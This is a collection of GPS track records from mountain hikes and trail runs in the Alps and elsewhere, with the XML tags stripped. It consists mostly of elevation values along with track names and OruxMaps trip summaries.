+806.6899999999999 + + +815.3799999999999 + + +821.9099999999999 + + +815.6399999999999 + + +810.7999999999996 + + +824.5099999999995 + + +822.4999999999998 + + +813.1899999999997 + + +803.63 + + +818.65 + + +821.31 + + +835.52 + + +847.4300000000002 + + +826.6900000000004 + + +827.7700000000003 + + +833.0300000000003 + + +839.2400000000001 + + +837.6999999999999 + + +832.59 + + +832.4799999999999 + + +832.6399999999999 + + +824.0600000000001 + + +822.5000000000002 + + +829.4899999999999 + + +832.63 + + +836.9200000000001 + + +837.92 + + +847.0399999999996 + + +849.7999999999996 + + +852.1599999999997 + + +854.4299999999995 + + +854.75 + + +855.6799999999997 + + +866.0299999999997 + + +866.9899999999997 + + +866.33 + + +865.3100000000001 + + +873.7400000000002 + + +902.1300000000003 + + +896.9200000000003 + + +882.4600000000002 + + +883.14 +" +" + + +KOMPASS Digital Map Track + + + + + + + +Haritzersteig 22.07 + + + + + + +1262.25 + + + +1263.17 + + + +1269.04 + + + +1262.73 + + + +1266.94 + + + +1266.19 + + + +1267.56 + + + +1261.52 + + + +1273.23 + + + +1283.02 + + + +1291.88 + + + +1298.02 + + + +1306.44 + + + +1307.43 + + + +1335.77 + + + +1333.44 + + + +1344.12 + + + +1352.45 + + + +1370.38 + + + +1371.49 + + + +1384.52 + + + +1400.39 + + + +1403.11 + + + +1433.76 + + + +1460.88 + + + +1496.96 + + + +1498.17 + + + +1519.62 + + + +1560.18 + + + +1565.23 + + + +1565.97 + + + +1547.44 + + + +1530.58 + + + +1519.59 + + + +1492.72 + + + +1484.68 + + + +1468.66 + + + +1465.33 + + + +1453.2 + + + +1447.24 + + + +1431.45 + + + +1433.35 + + + +1434.66 + + + +1432.4 + + + +1418.38 + + + +1434.74 + + + +1444.62 + + + +1431.81 + + + +1401.34 + + + +1380.46 + + + +1381.17 + + + +1352.64 + + + +1356.22 + + + +1338.98 + + + +1330.96 + + + +1311.98 + + + +1301.45 + + + +1291.06 + + + +1289.44 + + + +1280.8 + + + +1280.49 + + + +1264.35 + + + +1259.76 + +" +" + + + + + + + + + + + +50.0 + +2d +3 + +0.0 + +226.0 + +50.0 + +3d +5 + +0.0 + +341.0 + +50.0 + +3d +6 + +0.1 +60.2 + +384.0 + +50.0 + +3d +6 + +0.0 + +504.0 + +50.0 + +3d +9 + +0.0 + +109.0 + +50.0 + +3d +5 + +0.0 + +-160.0 + +50.0 + +3d +6 + +0.0" +" + + +Augstmatthorn + +_mel_ + +_mel_ on GPSies.com +GPSiesUserOnWeb + + +Augstmatthorn on GPSies.com +trackOnWeb + + +round trip +604.0 +6811.3468075627425 +1556.0 +2099.0 +603.0 + +Augstmatthorn on GPSies.com + +trackOnWeb + + +1556.0 + + + +1562.0 + + + +1576.0 + + + +1592.0 + + + +1625.0 + + + +1631.0 + + + +1644.0 + + + +1667.0 + + + +1694.0 + + + +1698.0 + + + +1708.0 + + + +1714.0 + + + +1721.0 + + + +1734.0 + + + +1780.0 + + + +1846.0 + + + +1900.0 + + + +1915.0 + + + +1936.0 + + + +1944.0 + + + +1966.0 + + + +1991.0 + + + +2002.0 + + + +2035.0 + + + +2091.0 + + + +2087.0 + + + +2049.0 + + + +2087.0 + + + +2091.0 + + + +2087.0 + + + +2094.0 + + + +2098.0 + + + +2099.0 + + + +2098.0 + + + +2094.0 + + + +2087.0 + + + +2091.0 + + + +2087.0 + + + +2046.0 + + + +2042.0 + + + +2040.0 + + + +2045.0 + + + +2057.0 + + + +2053.0 + + + +1947.0 + + + +1949.0 + + + +1857.0 + + + +1860.0 + + + +1872.0 + + + +1840.0 + + + +1836.0 + + + +1810.0 + + + +1808.0 + + + +1783.0 + + + +1779.0 + + + +1775.0 + + + +1763.0 + + + +1734.0 + + + +1721.0 + + + +1714.0 + + + +1708.0 + + + +1698.0 + + + +1694.0 + + + +1667.0 + + + +1644.0 + + + +1631.0 + + + +1625.0 + + + +1592.0 + + + +1576.0 + + + +1562.0 + + + +1558.0 + + + +1557.0 + +" +" + + + + + + +Garmin International + + + +Aktueller Track: 15 MRZ 2015 10:00 + + + + + + +734.58 + + + +686.39453125 + + +686.0546875 + + +685.734375 + + +685.328125 + + +718.72 + + + +717.76 + + + +706.23 + + + +702.38 + + + +694.69 + + + +687.0 + + + +672.58 + + + +666.81 + + + +662.01 + + + +661.04 + + + +659.12 + + + +656.72 + + + +656.24 + + + +652.87 + + + +652.87 + + + +658.16 + + + +652.87 + + + +649.99 + + + +650.47 + + + +648.07 + + + +647.1 + + + +646.14 + + + +646.62 + + + +646.14 + + + +646.62 + + + +643.74 + + + +648.55 + + + +649.03 + + + +649.03 + + + +649.99 + + + +650.47 + + + +650.95 + + + +650.95 + + + +651.91 + + + +652.87 + + + +653.83 + + + +653.35 + + + +655.28 + + + +654.8 + + + +672.58 + + + +678.35 + + + +667.29 + + + +659.6 + + + +663.93 + + + +661.52 + + + +662.97 + + + +659.12 + + + +662.97 + + + +668.25 + + + +673.06 + + + +673.54 + + + +675.46 + + + +676.91 + + + +678.83 + + + +683.63 + + + +683.63 + + + +677.91796875 + + +677.25 + + +685.34375 + + +686.40234375 + + +686.390625 + + +681.71 + +" +" + + + + + + +Garmin International + + +2016-09-29 16:37:42-Trail Run + + + + + +1982.86 + + + +1976.61 + + + +1972.28 + + + +1975.65 + + + +1981.41 + + + +1988.14 + + + +2032.36 + + + +2046.3 + + + +2065.05 + + + +2045.34 + + + +2039.57 + + + +2053.99 + + + +2067.45 + + + +2082.35 + + + +2085.72 + + + +2084.76 + + + +2085.24 + + + +2092.93 + + + +2090.52 + + + +2103.02 + + + +2113.6 + + + +2116.96 + + + +2126.09 + + + +2118.4 + + + +2097.73 + + + +2109.27 + + + +2075.62 + + + +2021.79 + + + +2001.6 + + + +1999.2 + + + +2000.16 + + + +2011.22 + + + +2025.64 + + + +2017.94 + + + +2013.62 + + + +2007.37 + + + +2001.6 + + + +1996.8 + + + +1977.57 + + + +1960.75 + + + +1956.9 + + + +1944.88 + + + +1920.85 + + + +1908.83 + + + +1902.59 + + + +1886.72 + + + +1873.75 + + + +1858.85 + + + +1830.49 + + + +1825.2 + + + +1815.11 + + + +1809.34 + + + +1805.97 + + + +1803.57 + + + +1801.17 + + + +1808.86 + + + +1826.16 + + + +1835.77 + + + +1837.22 + + + +1845.39 + + + +1876.63 + + + +1888.65 + + + +1904.99 + + + +1910.76 + + + +1920.37 + + + +1924.22 + + + +1928.06 + + + +1946.33 + + + +1953.54 + + + +1958.34 + + + +1971.8 + + + +1979.97 + + + +1991.99 + +" +" + + +Hohsaas + + + + + + + + + +2395.9 + + +2404.8000335106053 + + +2416.0954781345317 + + +2427.6 + + +2440.5 + + +2451.4999094027385 + + +2458.7341251907774 + + +2462.39999885276 + + +2484.600075656143 + + +2498.999923184589 + + +2504.399986619206 + + +2513.4999073776667 + + +2532.5999450517656 + + +2541.19996473592 + + +2553.455143089319 + + +2566.4998934678497 + + +2571.399842563747 + + +2590.100089161819 + + +2603.340612753003 + + +2607.0 + + +2613.3000028954634 + + +2619.599887034982 + + +2631.6 + + +2639.700006868304 + + +2644.2 + + +2650.5999284656045 + + +2656.408187903452 + + +2656.3141699860666 + + +2661.3175976408897 + + +2668.461313959586 + + +2675.2 + + +2686.1999256368986 + + +2696.799969610013 + + +2704.199949194789 + + +2711.2 + + +2717.4 + + +2722.4 + + +2726.1 + + +2733.0000571973446 + + +2756.7000313494655 + + +2770.5000800165403 + + +2800.6999888106507 + + +2808.1338561191433 + + +2820.906876771809 + + +2827.5 + + +2833.1999196912066 + + +2839.6998979501027 + + +2903.3999809281636 + + +2966.299897859427 + + +2981.1001446491423 + + +3010.6001011587346 + + +3023.499947602944 + + +3049.0000340955216 + + +3098.171307695371 + + +3114.6 + + +3119.4 + + +3118.5 + + +3121.999952209325 + + +3087.699926873053 + + +3087.7 + + +3083.6589579733386 + + +3086.599964545129 + + +3068.7 + + +3070.5000209273294 + + +3073.4999379143533 + + +3087.600020161014 + + +3100.555625095149 + + +3104.0000189622106 + + +3131.9000635634757 + + +3137.4 +" +" + + + +Polar + + + + + + + + +710.0 + + + +692.0 + + + +684.0 + + + +703.0 + + + +708.0 + + + +719.0 + + + +729.0 + + + +741.0 + + + +754.0 + + + +767.0 + + + +778.0 + + + +790.0 + + + +791.0 + + + +807.0 + + + +824.0 + + + +824.0 + + + +838.0 + + + +854.0 + + + +898.0 + + + +936.0 + + + +963.0 + + + +1013.0 + + + +1043.0 + + + +1082.0 + + + +1160.0 + + + +1196.0 + + + +1252.0 + + + +1314.0 + + + +1354.0 + +" +" + + + + + + +Garmin International + + + +Traccia corrente: 05 OTT 2016 08:29 + + + + + + +561.55 + + + +573.56 + + + +579.33 + + + +586.06 + + + +573.56 + + + +573.56 + + + +571.64 + + + +572.6 + + + +569.72 + + + +569.72 + + + +568.28 + + + +564.91 + + + +565.87 + + + +562.51 + + + +555.3 + + + +563.95 + + + +562.51 + + + +562.51 + + + +565.39 + + + +568.28 + + + +570.68 + + + +571.16 + + + +573.08 + + + +572.6 + + + +572.12 + + + +570.68 + + + +573.08 + + + +580.77 + + + +581.73 + + + +582.7 + + + +591.35 + + + +582.22 + + + +577.41 + + + +565.87 + + + +563.95 + + + +562.51 + +" +" + + +pic foreant + + + + + +OruxMaps + + + +pic foreant +<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: pic foreant</h2><br /><p>Startzeit: 09/23/2015 12:01</p><p>Zielzeit: 09/23/2015 14:17</p><p>Strecke: 4,4km (02:16)</p><p>Bewegungszeit: 01:32</p><p>Ø-Geschwindigkeit: 1,9km/h</p><p>Netto-Geschwindigkeit: 2,9km/h</p><p>Max. Geschwindigkeit: 6,3km/h</p><p>Minimale Höhe: 2574m</p><p>Maximale Höhe: 3028m</p><p>Steig-Geschw.: 374m/h</p><p>Sink-Geschw.: -443,1m/h</p><p>Aufstieg: 456m</p><p>Abstieg: -457m</p><p>Steigzeit: 01:13</p><p>Sinkzeit: 01:01</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/> + +Unbestimmt + + + + + +2579.77 + + + +2582.39 + + + +2583.13 + + + +2588.73 + + + +2603.42 + + + +2626.79 + + + +2638.53 + + + +2636.88 + + + +2665.76 + + + +2680.66 + + + +2678.66 + + + +2670.17 + + + +2704.47 + + + +2731.14 + + + +2739.11 + + + +2757.64 + + + +2790.34 + + + +2795.75 + + + +2809.26 + + + +2860.18 + + + +2893.26 + + + +2907.14 + + + +2932.24 + + + +2966.54 + + + +2965.7 + + + +2962.77 + + + +2973.76 + + + +2996.64 + + + +3028.64 + + + +3023.51 + + + +3016.67 + + + +3010.64 + + + +3001.77 + + + +2982.65 + + + +2972.51 + + + +2962.7 + + + +2938.14 + + + +2920.64 + + + +2917.16 + + + +2869.64 + + + +2849.65 + + + +2816.67 + + + +2809.77 + + + +2799.65 + + + +2775.89 + + + +2758.64 + + + +2744.64 + + + +2718.51 + + + +2688.77 + + + +2676.2 + + + +2653.63 + + + +2650.66 + + + +2643.74 + + + +2631.64 + + + +2622.67 + + + +2594.74 + + + +2582.17 + + + +2578.76 + + + +2575.67 + +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + +Stockkogel + + + + + +OruxMaps + + + +Stockkogel +<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: Stockkogel</h2><br /><p>Startzeit: 08/07/2015 09:46</p><p>Zielzeit: 08/07/2015 13:50</p><p>Strecke: 6km (04:04)</p><p>Bewegungszeit: 01:58</p><p>Ø-Geschwindigkeit: 1,5km/h</p><p>Netto-Geschwindigkeit: 3km/h</p><p>Max. Geschwindigkeit: 7,5km/h</p><p>Minimale Höhe: 1817m</p><p>Maximale Höhe: 3106m</p><p>Steig-Geschw.: 356,3m/h</p><p>Sink-Geschw.: -349,4m/h</p><p>Aufstieg: 1357m</p><p>Abstieg: -80m</p><p>Steigzeit: 03:48</p><p>Sinkzeit: 00:13</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/> + +Unbestimmt + + + + + +1828.34 + + + +1836.06 + + + +1825.1 + + + +1817.48 + + + +1820.94 + + + +1833.53 + + + +1850.4 + + + +1859.93 + + + +1859.85 + + + +1865.81 + + + +1862.67 + + + +1886.55 + + + +1904.58 + + + +1915.51 + + + +1922.53 + + + +1950.94 + + + +1964.9 + + + +2000.9 + + + +2057.06 + + + +2114.94 + + + +2117.09 + + + +2147.97 + + + +2167.43 + + + +2172.88 + + + +2179.56 + + + +2228.94 + + + +2241.41 + + + +2273.03 + + + +2294.09 + + + +2340.47 + + + +2345.6 + + + +2361.12 + + + +2382.71 + + + +2413.97 + + + +2428.48 + + + +2442.92 + + + +2443.99 + + + +2452.59 + + + +2476.03 + + + +2500.05 + + + +2520.05 + + + +2538.56 + + + +2557.94 + + + +2566.19 + + + +2582.18 + + + +2594.06 + + + +2618.69 + + + +2611.82 + + + +2671.31 + + + +2674.1 + + + +2671.62 + + + +2675.53 + + + +2673.44 + + + +2679.96 + + + +2677.33 + + + +2687.91 + + + +2732.06 + + + +2784.34 + + + +2797.58 + + + +2839.44 + + + +2849.94 + + + +2852.1 + + + +2892.06 + + + +2911.53 + + + +2936.44 + + + +2970.44 + + + +3022.06 + + + +3106.04 + +" +" + + + + + + + + +Aufstieg Franz-Senn-Hütte + + + +1743.4 + + + +1743.0 + + + +1745.2 + + + +1751.9 + + + +1763.1 + + + +1770.2 + + + +1809.3 + + + +1823.3 + + + +1842.2 + + + +1841.7 + + + +1856.4 + + + +1858.2 + + + +1864.6 + + + +1868.2 + + + +1874.7 + + + +1883.0 + + + +1891.7 + + + +1905.2 + + + +1910.9 + + + +1918.8 + + + +1924.9 + + + +1921.9 + + + +1926.8 + + + +1959.3 + + + +1941.7 + + + +1972.6 + + + +1968.4 + + + +1984.6 + + + +1979.3 + + + +1988.7 + + + +2002.4 + + + +2007.4 + + + +2016.1 + + + +2021.7 + + + +2021.7 + + + +2034.1 + + + +2026.2 + + + +2029.4 + + + +2033.6 + + + +2033.7 + + + +2043.7 + + + +2048.0 + + + +2037.3 + + + +2073.6 + + + +2100.5 + + + +2111.2 + + + +2120.8 + + + +2123.7 + + + +2132.6 + + + +2138.6 + + + +2139.6 + + + +2145.4 + + + +2146.1 + + + +2149.4 + + + +2142.8 + + + +2146.8 + + + +2149.1 + + + +2151.5 + +" +" + + + + + + + + +Cornizzolo Vertical + + + +248.0 + + + + + + +258.4 + + + + + + +264.0 + + + + + + +267.0 + + + + + + +268.8 + + + + + + +269.0 + + + + + + +275.4 + + + + + + +282.4 + + + + + + +291.8 + + + + + + +301.4 + + + + + + +369.2 + + + + + + +386.8 + + + + + + +395.6 + + + + + + +405.4 + + + + + + +428.0 + + + + + + +466.6 + + + + + + +487.2 + + + + + + +503.4 + + + + + + +531.8 + + + + + + +571.6 + + + + + + +579.8 + + + + + + +600.0 + + + + + + +615.2 + + + + + + +636.0 + + + + + + +682.2 + + + + + + +718.8 + + + + + + +737.6 + + + + + + +757.6 + + + + + + +826.0 + + + + + + +919.2 + + + + + + +939.2 + + + + + + +989.4 + + + + + + +1013.2 + + + + + + +1027.4 + + + + + + +1040.6 + + + + + + +1053.4 + + + + + + +1062.4 + + + + + + +1069.6 + + + + + + +1074.4 + + + + + + +1103.8 + + + + + + +1128.0 + + + + + + +1134.2 + + + + + + +1178.4 + + + + + + +1187.4 + + + + + + +1206.6 + + + + + " +" + + +2017.10.07 Capanna Cava + + + + + + + + + +2004.7 + + +2012.1 + + +2020.5 + + +2030.8014081711285 + + +2037.8999677711997 + + +2042.099999866902 + + +2050.6 + + +2054.100010711014 + + +2065.500029816756 + + +2065.799992439151 + + +2072.0998858671724 + + +2082.69997771037 + + +2098.399969498185 + + +2116.1001188570513 + + +2166.800032822942 + + +2177.999981964324 + + +2199.3999338438393 + + +2215.0999361615586 + + +2226.200003787706 + + +2259.4999589392733 + + +2255.2 + + +2292.8 + + +2302.8 + + +2340.3 + + +2370.7 + + +2368.3 + + +2359.4 + + +2348.7 + + +2346.6 + + +2349.4 + + +2357.9 + + +2361.2 + + +2344.9 + + +2304.9 + + +2281.9 + + +2089.1 + + +2073.599964473042 + + +2068.199990798241 + + +2065.5000198042426 + + +2065.7999924391565 + + +2065.5000298168757 + + +2054.1000107114114 + + +2050.6 + + +2042.099999866902 + + +2037.8999677711965 + + +2021.7000135739654 + + +2011.4 + + +2004.5 +" +" + + + + + + +Garmin International + + +AUG-30-14 14:17:45 + + + +2242.41 + + + +2247.7 + + + +2253.95 + + + +2261.64 + + + +2281.35 + + + +2285.67 + + + +2289.04 + + + +2306.82 + + + +2315.95 + + + +2321.24 + + + +2352.0 + + + +2364.02 + + + +2375.07 + + + +2385.65 + + + +2397.67 + + + +2426.99 + + + +2451.02 + + + +2474.09 + + + +2481.78 + + + +2481.78 + + + +2488.03 + + + +2491.87 + + + +2496.68 + + + +2502.93 + + + +2509.66 + + + +2508.22 + + + +2502.45 + + + +2497.64 + + + +2501.97 + + + +2502.45 + + + +2510.62 + + + +2521.19 + + + +2528.4 + + + +2530.33 + + + +2535.13 + + + +2541.86 + + + +2544.27 + + + +2542.34 + + + +2539.94 + + + +2538.5 + + + +2543.31 + + + +2555.32 + + + +2565.9 + + + +2574.07 + + + +2589.93 + +" +" + + +Eich + +Monika Teusch - Community + + + + + +Eich + + + +698.28894 + + +694.65356 + + +691.26074 + + +684.80359 + + +675.74622 + + +681.61365 + + +684.36133 + + +688.40918 + + +699.87354 + + +702.05689 + + +701.01306 + + +700.58752 + + +703.06885 + + +708.40088 + + +711.90894 + + +709.51099 + + +712.27612 + + +716.40735 + + +715.89478 + + +724.21362 + + +712.77319 + + +686.87219 + + +687.8335 + + +681.96802 + + +686.4707 + + +681.99951 + + +678.87622 + + +677.95032 + + +686.2356 + + +696.12036 + + +714.12769 + + +731.83545 + + +733.1687 + + +732.59412 + + +733.62036 + + +740.9458 + + +748.68945 + + +754.25024 + + +763.53491 + + +773.44678 + + +791.18311 + + +803.82007 + + +797.79968 + + +793.81958 + + +790.30322 + + +782.76831 + + +770.21033 + + +764.66187 + + +761.03259 + + +744.43311 + + +730.77905 + + +733.64539 + + +731.48584 + + +722.26392 + + +712.22022 + + +710.3584 + + +705.67529 + + +688.19617 + + +665.71753 + + +660.62268 + + +658.01221 + + +651.43042 + + +650.0343 + + +651.82105 + + +644.66943 + + +646.05383 + + +641.48617 +" +" + + + + + + + + + +Traccia corrente: 15 AGO 2016 07:31 +Traccia corrente: 15 AGO 2016 07:31 + + + +1218.609985 + + + +1227.73999 + + + +1240.719971 + + + +1245.040039 + + + +1264.27002 + + + +1270.040039 + + + +1274.849976 + + + +1291.189941 + + + +1302.719971 + + + +1321.950073 + + + +1323.869873 + + + +1343.099976 + + + +1356.560059 + + + +1385.399902 + + + +1392.130005 + + + +1413.76001 + + + +1422.410034 + + + +1442.109985 + + + +1452.209961 + + + +1456.529907 + + + +1469.51001 + + + +1507.0 + + + +1533.440063 + + + +1557.469971 + + + +1573.820068 + + + +1583.910034 + + + +1611.790039 + + + +1657.450073 + + + +1677.640015 + + + +1692.059937 + + + +1747.809937 + + + +1795.880005 + + + +1855.47998 + + + +1867.980103 + + + +1891.530029 + + + +1940.079956 + + + +1955.460083 + + + +1975.169922 + + + +1999.200073 + + + +2015.060059 + + + +2041.02002 + + + +2083.790039 + + + +2091.0 + + + + +2091.48999 + + + +2096.77002 + + + +2113.600098 + + + +2160.699951 + + + +2207.319824 + + + +2231.360107 + + + +2238.570068 + + + +2247.699951 + + + +2266.449951 + + + +2270.290039 + + + +2297.209961 + + + +2348.159912 + + + +2363.540039 + + + +2385.649902 + + + +2389.969971 + + + +2414.969971 + + + +2433.709961 + + + +2446.209961 + + + +2483.699951 + + + +2501.01001 + + + +2515.429932 + + + +2563.01001 + + + +2602.429932 + + + +2602.429932 + + + +2616.850098 + + + +2628.379883 + + + +2634.629883 + + + +2686.060059 + +" +" + + + + + + + +Traccia 1/3/2017 + + + +521.0 + + + +549.0 + + + +551.0 + + + +532.0 + + + +546.0 + + + +547.0 + + + +549.0 + + + +562.0 + + + +542.0 + + + +555.0 + + + +553.0 + + + +572.0 + + + +603.0 + + + +604.0 + + + +593.0 + + + +578.0 + + + +602.0 + + + +622.0 + + + +635.0 + + + +634.0 + + + +587.0 + + + +641.0 + + + +650.0 + + + +644.0 + + + +672.0 + + + +691.0 + + + +685.0 + + + +679.0 + + + +660.0 + + + +669.0 + + + +681.0 + + + +685.0 + + + +679.0 + + + +684.0 + + + +710.0 + + + +729.0 + + + +746.0 + + + +786.0 + + + +760.0 + + + +773.0 + + + +780.0 + + + +770.0 + + + +792.0 + + + +795.0 + + + +790.0 + + + +793.0 + + + +799.0 + + + +797.0 + + + +791.0 + + + +820.0 + + + +824.0 + + + +819.0 + + + +824.0 + + + +834.0 + + + +837.0 + + + +836.0 + + + +839.0 + + + +862.0 + + + +882.0 + + + +886.0 + + + +882.0 + + + +873.0 + + + +899.0 + + + +885.0 + + + +886.0 + + + +923.0 + + + +939.0 + + + +947.0 + +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + + +8 + + + +3104.2 + + +3070.6 + + +3061.9 + + +3040.3 + + +3029.3 + + +3025.9 + + +3011.0 + + +3001.9 + + +2993.2 + + +2980.2 + + +2985.5 + + +2996.1 + + +3014.4 + + +3036.0 + + +3040.8 + + +3043.2 + + +3049.4 + + +3051.8 + + +3056.2 + + +3061.5 + + +3073.0 + + +3078.8 + + +3102.8 + + +3107.6 + + +3115.8 + + +3120.6 + + +3126.8 + + +3131.2 + + +3161.9 + + +3168.2 + + +3178.7 + + +3193.6 + + +3203.2 + + +3220.6 + + +3224.4 + + +3229.2 + + +3244.1 + + +3250.4 + + +3260.4 + + +3282.6 + + +3295.5 + + +3302.7 + + +3308.0 + + +3328.7 + + +3332.1 + + +3342.6 + + +3356.6 + + +3383.5 + + +3394.6 + + +3405.1 + + +3417.6 +" +" + + + + + + + +Linie + + + +956.3 + + +965.7 + + +981.6 + + +984.4 + + +998.5 + + +1021.5 + + +1055.5 + + +1078.1 + + +1113.1 + + +1140.0 + + +1138.9 + + +1153.6 + + +1195.5 + + +1218.3 + + +1217.9 + + +1214.7 + + +1216.6 + + +1237.7 + + +1236.1 + + +1248.0 + + +1264.6 + + +1261.6 + + +1278.9 + + +1279.2 + + +1282.9 + + +1291.0 + + +1312.6 + + +1314.8 + + +1349.6 + + +1356.3 + + +1375.4 + + +1370.8 + + +1385.3 + + +1385.1 + + +1397.1 + + +1411.1 + + +1434.3 + + +1448.0 + + +1465.7 + + +1476.6 + + +1494.4 + + +1509.0 + + +1522.7 + + +1535.6 + + +1542.7 + + +1555.9 + + +1563.2 + + +1583.7 +" +" + + + + + + + +Arera + + + + +1586.295898 + + +2.0 +3.2 + +1593.122314 + + +1.0 +1.4 + +1599.245605 + + +1.0 +1.4 + +1628.968506 + + +1.0 +1.4 + +1635.718994 + + +1.0 +1.4 + +1646.760742 + + +1.0 +1.4 + +1660.842773 + + +1.0 +1.4 + +1734.270508 + + +1.0 +1.4 + +1762.068848 + + +1.0 +1.4 + +1791.494629 + + +1.0 +1.4 + +1812.611328 + + +1.0 +1.4 + +1831.404785 + + +1.0 +1.4 + +1872.55957 + + +1.0 +1.4 + +1901.560547 + + +1.0 +1.4 + +1921.313477 + + +1.0 +1.4 + +1933.297852 + + +1.0 +1.4 + +1937.616211 + + +1.0 +1.4 + +1962.240479 + + +1.0 +1.4 + + +1977.125488 + + +2.0 +3.2 + +1962.932838 + + +1.0 +1.4 + +1986.818336 + + +1.0 +1.4 + +1990.233376 + + +1.0 +1.4 + +1993.756813 + + +1.0 +1.4 + +2032.253883 + + +1.0 +1.4 + +2038.579079 + + +1.0 +1.4 + +2066.692604 + + +1.0 +1.4 + +2141.874489 + + +1.0 +1.4 + +2162.861549 + + +1.0 +1.4 + +2216.68821 + + +1.0 +1.4 + +2239.56736 + + +1.0 +1.4 + +2269.647682 + + +1.0 +1.4 + +2302.073708 + + +1.0 +1.4 + +2308.93943 + + +1.0 +1.4 + +2334.150124 + + +1.0 +1.4 + +2366.962379 + + +1.0 +1.4 + +2388.630592 + + +1.0 +1.4 + +2405.932594 + + +1.0 +1.4 + +2414.529518 + + +1.0 +1.4 + +2418.03318 + + +1.0 +1.4 + +2416.368385 + + +1.0 +1.4 + +2412.930885 + + +2.0 +2.6 + +2413.911598 + + +2.0 +2.8 + +2412.736794 + + +1.0 +1.2 + +2448.689186 + + +1.0 +1.4 + +2463.585182 + + +1.0 +1.4 + +2478.563698 + + +1.0 +1.4 + +2502.200905 + + +1.0 +1.4 + +2509.015114 + + +1.0 +1.4" +" + + + + + + + + + +Inspiration Point (Bryce Canyon) + + + +2487.0 + + + + + +0.000000 + +2461.0 + + + + + +6.572899 + +2477.0 + + + + + +3.504578 + +2488.0 + + + + + +4.252090 + +2478.0 + + + + + +2.194794 + +2495.0 + + + + + +12.490112 + +2498.0 + + + + + +2.137543 + +2500.0 + + + + + +9.408661 + +2505.0 + + + + + +1.424591 + +2477.0 + + + + + +1.423157 + +2505.0 + + + + + +8.535461 + +2497.0 + + + + + +1.014099 + +2466.0 + + + + + +8.173828 + +2488.0 + + + + + +2.167603 + +2489.0 + + + + + +7.634766" +" + + + + + + +Garmin International + + + +07.10.15, 14:00:03 + + + + + + +1068.4000244140625 + + + + + + +1068.5999755859375 + + + + + + +1081.5999755859375 + + + + + + +1087.0 + + + + + + +1090.199951171875 + + + + + + +1105.0 + + + + + + +1110.800048828125 + + + + + + +1116.800048828125 + + + + + + +1122.199951171875 + + + + + + +1129.0 + + + + + + +1134.5999755859375 + + + + + + +1142.4000244140625 + + + + + + +1158.800048828125 + + + + + + +1170.5999755859375 + + + + + + +1189.800048828125 + + + + + + +1227.0 + + + + + + +1234.0 + + + + + + +1267.4000244140625 + + + + + + +1303.5999755859375 + + + + + + +1314.4000244140625 + + + + + + +1322.199951171875 + + + + + + +1338.199951171875 + + + + + + +1350.0 + + + + + + +1356.5999755859375 + + + + + + +1364.199951171875 + + + + + + +1371.4000244140625 + + + + + + +1369.4000244140625 + + + + + + +1366.5999755859375 + + + + + + +1364.800048828125 + + + + + + +1357.4000244140625 + + + + + + +1369.199951171875 + + + + + + +1378.0 + + + + + + +1391.199951171875 + + + + + + +1392.199951171875 + + + + + + +1385.0 + + + + + + +1376.0 + + + + + + +1357.800048828125 + + + + + + +1350.4000244140625 + + + + + + +1346.0 + + + + + + +1325.199951171875 + + + + + " +" + + + + + + + +Schönwieskopf + + + +1454.0 + + + +1446.0 + + + +1480.0 + + + +1508.0 + + + +1544.0 + + + +1546.0 + + + +1555.0 + + + +1569.0 + + + +1587.0 + + + +1610.0 + + + +1618.0 + + + +1612.0 + + + +1637.0 + + + +1671.0 + + + +1690.0 + + + +1696.0 + + + +1731.0 + + + +1833.0 + + + +1907.0 + + + +1953.0 + + + +2033.0 + + + +2025.0 + + + +2012.0 + + + +1984.0 + + + +1921.0 + + + +1874.0 + + + +1778.0 + + + +1774.0 + + + +1733.0 + + + +1711.0 + + + +1695.0 + + + +1629.0 + + + +1597.0 + + + +1578.0 + + + +1562.0 + + + +1541.0 + + + +1533.0 + + + +1524.0 + + + +1513.0 + + + +1465.0 + + + +1451.0 + + + +1440.0 + + + +1440.0 + + + +1439.0 + + + +1425.0 + + + +1425.0 + + + +1416.0 + + + +1405.0 + + + +1403.0 + + + +1388.0 + + + +1374.0 + + + +1352.0 + + + +1350.0 + + + +1319.0 + + + +1312.0 + + + +1313.0 + + + +1315.0 + + + +1301.0 + + + +1311.0 + + + +1288.0 + + + +1261.0 + + + +1239.0 + + + +1238.0 + + + +1226.0 + + + +1207.0 + + + +1181.0 + + + +1137.0 + + + +1121.0 + + + +1119.0 + + + +1072.0 + + + +1087.0 + + + +1076.0 + + + +1071.0 + +" +" + + +eremo san grato + 25/ago/2015 13:58:34 + + +1854.0 + + +1796.0 + + +1786.0 + + +1799.0 + + +1786.0 + + +1791.0 + + +1796.0 + + +1782.0 + + +1779.0 + + +1770.0 + + +1781.0 + + +1755.0 + + +1775.0 + + +1782.0 + + +1772.0 + + +1800.0 + + +1782.0 + + +1766.0 + + +1765.0 + + +1766.0 + + +1759.0 +" +" + + + + + + +Garmin International + + + +Lombardia - Roccoli Lorla - Monte Legnone + + + + + + +1441.41 + + + +1442.35 + + + +1453.24 + + + +1462.53 + + + +1450.52 + + + +1468.94 + + + +1477.67 + + + +1487.9 + + + +1500.66 + + + +1520.98 + + + +1533.05 + + + +1531.11 + + + +1546.79 + + + +1558.47 + + + +1564.9 + + + +1586.41 + + + +1594.14 + + + +1597.19 + + + +1611.05 + + + +1624.04 + + + +1634.77 + + + +1643.21 + + + +1657.03 + + + +1676.87 + + + +1692.86 + + + +1668.54 + + + +1682.06 + + + +1693.92 + + + +1700.26 + + + +1712.41 + + + +1727.46 + + + +1747.04 + + + +1758.91 + + + +1769.92 + + + +1782.27 + + + +1797.23 + + + +1811.47 + + + +1825.85 + + + +1837.06 + + + +1853.57 + + + +1893.33 + + + +1958.15 + + + +1992.08 + + + +2023.92 + + + +2032.12 + + + +2041.12 + + + +2046.98 + + + +2050.19 + + + +2086.7 + + + +2109.91 + + + +2111.88 + + + +2133.89 + + + +2159.87 + + + +2192.46 + + + +2203.11 + + + +2225.23 + + + +2235.77 + + + +2314.68 + + + +2388.29 + + + +2421.36 + + + +2445.54 + + + +2477.06 + + + +2506.05 + + + +2546.84 + 